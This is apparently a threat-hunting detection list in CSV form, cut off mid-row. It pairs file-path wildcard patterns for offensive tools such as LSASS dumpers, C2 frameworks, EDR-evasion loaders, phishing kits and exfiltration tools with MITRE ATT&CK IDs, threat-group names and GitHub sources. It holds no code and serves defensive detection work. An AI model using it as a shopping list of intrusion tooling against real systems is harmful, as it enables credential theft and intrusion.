-*\dllexploit.exe*,offensive_tool_keyword,RunAsWinTcb,RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.,T1073.002 - T1055.001 - T1055.002,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/tastypepperoni/RunAsWinTcb,1,0,N/A,10,2,119,16,2022-08-02T16:35:50Z,2022-07-29T16:36:06Z -*\DllExport.bat*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*\DllVoidFunction.txt*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*\dnscan.py*,offensive_tool_keyword,dnscan,dnscan is a python wordlist-based DNS subdomain scanner.,T1595 - T1595.002 - T1018 - T1046,TA0007 - TA0043,N/A,N/A,Reconnaissance,https://github.com/rbsec/dnscan,1,0,N/A,6,10,984,413,2022-08-09T11:11:31Z,2013-03-13T10:42:07Z -*\DocsPLZ.cpp*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,0,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*\DocsPLZ.exe*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,0,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*\DoHC2.cs*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,0,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*\DomainRecon\*.txt,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*\donut.exe*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*\donut\VanillaProgram.bin*,offensive_tool_keyword,NtRemoteLoad,Remote Shellcode Injector,T1055 - T1027 - T1218.010,TA0002 - TA0005 - TA0010,N/A,N/A,Exploitation tool,https://github.com/florylsk/NtRemoteLoad,1,0,N/A,10,2,173,35,2023-08-27T17:14:44Z,2023-08-27T16:52:31Z -*\Doraemon*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\duedlligence.dll*,offensive_tool_keyword,DueDLLigence,Shellcode runner framework for application whitelisting bypasses and DLL side-loading,T1055.012 - T1218.011,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/mandiant/DueDLLigence,1,0,N/A,10,5,441,90,2023-06-02T14:24:43Z,2019-10-04T18:34:27Z -*\dumper.ps1*,offensive_tool_keyword,PowershellKerberos,Some scripts to abuse kerberos using Powershell,T1558.003 - T1558.004 - T1059.001,TA0006 - TA0002,N/A,N/A,Exploitation Tools,https://github.com/MzHmO/PowershellKerberos,1,0,N/A,9,3,262,37,2023-07-27T09:53:47Z,2023-04-22T19:16:52Z -*\dumpert.*,offensive_tool_keyword,cobaltstrike,LSASS memory dumper using direct system calls and API unhooking.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor,1,0,N/A,10,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*\Dumpert\*,offensive_tool_keyword,cobaltstrike,LSASS memory dumper using direct system calls and API unhooking.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor,1,0,N/A,10,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*\DumpShellcode*,offensive_tool_keyword,cobaltstrike,Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.,T1055 - T1078.003,TA0002 - TA0006,N/A,N/A,Credential Access,https://github.com/trustedsec/PPLFaultDumpBOF,1,0,N/A,N/A,2,115,11,2023-05-17T12:57:20Z,2023-05-16T13:02:22Z -*\dumpXor.exe*,offensive_tool_keyword,cobaltstrike,dump lsass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/seventeenman/CallBackDump,1,0,N/A,10,10,510,74,2023-07-20T09:03:33Z,2022-09-25T08:29:14Z -*\dumpXor\x64\*,offensive_tool_keyword,cobaltstrike,dump lsass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/seventeenman/CallBackDump,1,0,N/A,10,10,510,74,2023-07-20T09:03:33Z,2022-09-25T08:29:14Z -*\ebowla.py*,offensive_tool_keyword,Ebowla,Framework for Making Environmental Keyed Payloads,T1027.002 - T1059.003 - T1140,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Genetic-Malware/Ebowla,1,0,N/A,10,8,710,179,2019-01-28T10:45:15Z,2016-04-07T22:29:58Z -*\EDD.exe,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*\edraser.py*,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z -*\Egress-Assess*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*\Ekko.exe*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*\elevateit.bat*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,0,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*\ELF\portscan*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,0,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*\ELF\serverscan*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,0,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*\Elite.csproj*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*\Elite.sln*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*\emailall.py*,offensive_tool_keyword,EmailAll,EmailAll is a powerful Email Collect tool,T1114.001 - T1113 - T1087.003,TA0009 - TA0003,N/A,N/A,Reconnaissance,https://github.com/Taonn/EmailAll,1,0,N/A,6,6,577,101,2022-03-04T10:36:41Z,2022-02-14T06:55:30Z -*\enc_shellcode.bin*,offensive_tool_keyword,ReflectiveNtdll,A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode,T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/reveng007/ReflectiveNtdll,1,0,N/A,10,2,147,22,2023-02-10T05:30:28Z,2023-01-30T08:43:16Z -*\enc_shellcode.h*,offensive_tool_keyword,ReflectiveNtdll,A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode,T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/reveng007/ReflectiveNtdll,1,0,N/A,10,2,147,22,2023-02-10T05:30:28Z,2023-01-30T08:43:16Z -*\ES.Alan.Core*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*\EternalHushCore.dll*,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,0,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z -*\EternalHushCore\*,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,0,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z -*\etw-fuck.cpp*,offensive_tool_keyword,Fuck-Etw,Bypass the Event Trace Windows(ETW) and unhook ntdll.,T1070.004 - T1055.001,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/unkvolism/Fuck-Etw,1,0,N/A,10,1,63,9,2023-09-29T21:19:10Z,2023-09-25T18:59:10Z -*\etw-fuck.exe*,offensive_tool_keyword,Fuck-Etw,Bypass the Event Trace Windows(ETW) and unhook ntdll.,T1070.004 - T1055.001,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/unkvolism/Fuck-Etw,1,0,N/A,10,1,63,9,2023-09-29T21:19:10Z,2023-09-25T18:59:10Z -*\ETWHash.*,offensive_tool_keyword,ETWHash,C# POC to extract NetNTLMv1/v2 hashes from ETW provider,T1556.001,TA0009 ,N/A,N/A,Credential Access,https://github.com/nettitude/ETWHash,1,1,N/A,N/A,3,229,27,2023-05-10T06:45:06Z,2023-04-26T15:53:01Z -*\EventViewer-UACBypass*,offensive_tool_keyword,EventViewer-UACBypass,RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass,T1078.004 - T1216 - T1068,TA0004 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CsEnox/EventViewer-UACBypass,1,0,N/A,10,2,108,21,2022-04-29T09:42:37Z,2022-04-27T12:56:59Z -*\evil.dll*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*\evil.dll*,offensive_tool_keyword,localpotato,The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.,T1550.002 - T1078.003 - T1005 - T1070.004,TA0004 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/decoder-it/LocalPotato,1,0,N/A,10,5,463,69,2023-02-12T18:39:49Z,2023-01-04T18:22:29Z -*\evil_pdf\*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*\EvilClippy*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*\evilclippy.cs*,offensive_tool_keyword,EvilClippy,A cross-platform assistant for creating malicious MS Office documents,T1566.001 - T1059.001 - T1204.002,TA0004 - TA0002,N/A,N/A,Phishing,https://github.com/outflanknl/EvilClippy,1,0,N/A,10,10,1956,381,2022-05-19T23:00:22Z,2019-03-26T12:14:03Z -*\EvilnoVNC*,offensive_tool_keyword,EvilnoVNC,EvilnoVNC is a Ready to go Phishing Platform,T1566 - T1566.001 - T1071 - T1071.001,TA0043 - TA0001,N/A,N/A,Phishing,https://github.com/JoelGMSec/EvilnoVNC,1,0,N/A,9,7,662,118,2023-09-25T10:50:52Z,2022-09-04T10:48:49Z -*\evilSignatures.db*,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z -*\exe_to_dll\*,offensive_tool_keyword,exe_to_dll,Converts a EXE into DLL,T1027.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/hasherezade/exe_to_dll,1,0,N/A,5,10,1095,177,2023-07-26T11:41:27Z,2020-04-16T16:27:00Z -*\Exegol-*.zip*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*\exegol.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*\Exegol-images-*.zip*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*\Exegol-images-*\*docker*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*\exfiltrate.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,0,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*\ExternalC2\*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,0,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*\FakeCmdLine*,offensive_tool_keyword,FakeCmdLine,Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.,T1059 - T1036,TA0003,N/A,N/A,Defense Evasion,https://github.com/gtworek/PSBits/tree/master/FakeCmdLine,1,0,N/A,N/A,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*\Fertliser.exe*,offensive_tool_keyword,Farmer,Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the 